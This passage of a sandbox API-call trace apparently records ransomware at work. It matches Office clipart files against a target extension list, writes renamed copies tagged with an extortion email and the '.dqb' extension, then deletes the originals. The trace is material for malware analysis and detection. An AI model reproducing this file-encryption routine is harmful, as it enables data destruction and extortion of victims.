(lpString1=".pdf", lpString2=".WMF") returned -1 [0052.923] lstrlenW (lpString=".xls") returned 4 [0052.923] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.923] lstrlenW (lpString=".xlsx") returned 5 [0052.923] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.923] lstrlenW (lpString=".ppt") returned 4 [0052.923] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0052.923] lstrlenW (lpString=".zip") returned 4 [0052.923] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.923] lstrlenW (lpString=".rar") returned 4 [0052.923] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.923] lstrlenW (lpString=".bz2") returned 4 [0052.923] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.923] lstrlenW (lpString=".7z") returned 3 [0052.923] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0052.923] lstrlenW (lpString=".dbf") returned 4 [0052.923] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0052.923] lstrlenW (lpString=".1cd") returned 4 [0052.924] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0052.924] lstrlenW (lpString=".jpg") returned 4 [0052.924] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.924] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.925] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0052.925] GetLastError () returned 0x0 [0052.925] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1df4, lpOverlapped=0x0) returned 1 [0052.926] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1e00, lpOverlapped=0x0) returned 1 [0052.927] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0052.927] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.927] SetEndOfFile (hFile=0x214) returned 1 [0052.927] CloseHandle (hObject=0x214) returned 1 [0052.928] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.928] SetEndOfFile (hFile=0x17c) returned 1 [0052.928] CloseHandle (hObject=0x17c) returned 1 [0052.928] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.929] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf")) returned 1 [0052.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0052.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0052.929] lstrlenW (lpString=".doc") returned 4 [0052.929] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.929] lstrlenW (lpString=".docx") returned 5 [0052.929] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.929] lstrlenW (lpString=".pdf") returned 4 [0052.929] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.929] lstrlenW (lpString=".xls") returned 4 [0052.929] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.929] lstrlenW (lpString=".xlsx") returned 5 [0052.929] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.929] lstrlenW (lpString=".ppt") returned 4 [0052.929] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0052.929] lstrlenW (lpString=".zip") returned 4 [0052.929] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.929] lstrlenW (lpString=".rar") returned 4 [0052.929] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.929] lstrlenW (lpString=".bz2") returned 4 [0052.930] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.930] lstrlenW (lpString=".7z") returned 3 [0052.930] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0052.930] lstrlenW (lpString=".dbf") returned 4 [0052.930] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0052.930] lstrlenW (lpString=".1cd") returned 4 [0052.930] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0052.930] lstrlenW (lpString=".jpg") returned 4 [0052.930] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.930] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.930] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0052.930] GetLastError () returned 0x0 [0052.930] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x212c, lpOverlapped=0x0) returned 1 [0052.932] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x2130, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x2130, lpOverlapped=0x0) returned 1 [0052.933] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0052.933] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.933] SetEndOfFile (hFile=0x214) returned 1 [0052.934] CloseHandle (hObject=0x214) returned 1 [0052.934] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.934] SetEndOfFile (hFile=0x17c) returned 1 [0052.934] CloseHandle (hObject=0x17c) returned 1 [0052.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.935] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf")) returned 1 [0052.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0052.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0052.935] lstrlenW (lpString=".doc") returned 4 [0052.935] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.935] lstrlenW (lpString=".docx") returned 5 [0052.935] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.935] lstrlenW (lpString=".pdf") returned 4 [0052.935] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.935] lstrlenW (lpString=".xls") returned 4 [0052.935] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.935] lstrlenW (lpString=".xlsx") returned 5 [0052.935] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.935] lstrlenW (lpString=".ppt") returned 4 [0052.935] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0052.935] lstrlenW (lpString=".zip") returned 4 [0052.935] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.935] lstrlenW (lpString=".rar") returned 4 [0052.935] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.936] lstrlenW (lpString=".bz2") returned 4 [0052.936] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.936] lstrlenW (lpString=".7z") returned 3 [0052.936] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0052.936] lstrlenW (lpString=".dbf") returned 4 [0052.936] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0052.936] lstrlenW (lpString=".1cd") returned 4 [0052.936] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0052.936] lstrlenW (lpString=".jpg") returned 4 [0052.936] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.936] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.936] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0052.936] GetLastError () returned 0x0 [0052.936] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1e7c, lpOverlapped=0x0) returned 1 [0052.938] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1e80, lpOverlapped=0x0) returned 1 [0052.939] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0052.939] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.939] SetEndOfFile (hFile=0x214) returned 1 [0052.939] CloseHandle (hObject=0x214) returned 1 [0052.939] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.939] SetEndOfFile (hFile=0x17c) returned 1 [0052.940] CloseHandle (hObject=0x17c) returned 1 [0052.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.940] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf")) returned 1 [0052.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0052.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0052.941] lstrlenW (lpString=".doc") returned 4 [0052.941] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.941] lstrlenW (lpString=".docx") returned 5 [0052.941] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.941] lstrlenW (lpString=".pdf") returned 4 [0052.941] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.941] lstrlenW (lpString=".xls") returned 4 [0052.941] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.941] lstrlenW (lpString=".xlsx") returned 5 [0052.941] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.941] lstrlenW (lpString=".ppt") returned 4 [0052.941] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0052.941] lstrlenW (lpString=".zip") returned 4 [0052.941] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.941] lstrlenW (lpString=".rar") returned 4 [0052.941] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.941] lstrlenW (lpString=".bz2") returned 4 [0052.941] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.941] lstrlenW (lpString=".7z") returned 3 [0052.941] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0052.941] lstrlenW (lpString=".dbf") returned 4 [0052.941] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0052.941] lstrlenW (lpString=".1cd") returned 4 [0052.942] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0052.942] lstrlenW (lpString=".jpg") returned 4 [0052.942] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.942] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.942] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0052.942] GetLastError () returned 0x0 [0052.942] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1e7c, lpOverlapped=0x0) returned 1 [0052.944] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1e80, lpOverlapped=0x0) returned 1 [0052.945] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0052.945] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.945] SetEndOfFile (hFile=0x214) returned 1 [0052.945] CloseHandle (hObject=0x214) returned 1 [0052.945] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.945] SetEndOfFile (hFile=0x17c) returned 1 [0052.946] CloseHandle (hObject=0x17c) returned 1 [0052.946] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.946] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf")) returned 1 [0052.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0052.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0052.946] lstrlenW (lpString=".doc") returned 4 [0052.946] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.947] lstrlenW (lpString=".docx") returned 5 [0052.947] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.947] lstrlenW (lpString=".pdf") returned 4 [0052.947] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.947] lstrlenW (lpString=".xls") returned 4 [0052.947] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.947] lstrlenW (lpString=".xlsx") returned 5 [0052.947] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.947] lstrlenW (lpString=".ppt") returned 4 [0052.947] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0052.947] lstrlenW (lpString=".zip") returned 4 [0052.947] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.947] lstrlenW (lpString=".rar") returned 4 [0052.947] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.947] lstrlenW (lpString=".bz2") returned 4 [0052.947] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.947] lstrlenW (lpString=".7z") returned 3 [0052.947] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0052.947] lstrlenW (lpString=".dbf") returned 4 [0052.947] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0052.947] lstrlenW (lpString=".1cd") returned 4 [0052.947] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0052.947] lstrlenW (lpString=".jpg") returned 4 [0052.947] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.947] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.948] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0052.948] GetLastError () returned 0x0 [0052.948] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x7e0, lpOverlapped=0x0) returned 1 [0052.949] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x7f0, lpOverlapped=0x0) returned 1 [0052.950] ReadFile (in: hFile=0x17c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0052.950] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.950] SetEndOfFile (hFile=0x214) returned 1 [0052.950] CloseHandle (hObject=0x214) returned 1 [0052.950] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0052.950] SetEndOfFile (hFile=0x17c) returned 1 [0052.951] CloseHandle (hObject=0x17c) returned 1 [0052.951] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.951] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf")) returned 1 [0052.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0052.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0052.952] lstrlenW (lpString=".doc") returned 4 [0052.952] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.952] lstrlenW (lpString=".docx") returned 5 [0052.952] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.952] lstrlenW (lpString=".pdf") returned 4 [0052.952] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.952] lstrlenW (lpString=".xls") returned 4 [0052.952] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.952] lstrlenW (lpString=".xlsx") returned 5 [0052.952] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.952] lstrlenW (lpString=".ppt") returned 4 [0052.952] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0052.952] lstrlenW (lpString=".zip") returned 4 [0052.952] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.952] lstrlenW (lpString=".rar") returned 4 [0052.952] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.952] lstrlenW (lpString=".bz2") returned 4 [0052.952] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.952] lstrlenW (lpString=".7z") returned 3 [0052.952] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0052.952] lstrlenW (lpString=".dbf") returned 4 [0052.952] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0052.952] lstrlenW (lpString=".1cd") returned 4 [0052.952] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0052.953] lstrlenW (lpString=".jpg") returned 4 [0052.953] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.398] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=2492) returned 1 [0053.398] CloseHandle (hObject=0x17c) returned 1 [0053.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf")) returned 0x20 [0053.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft 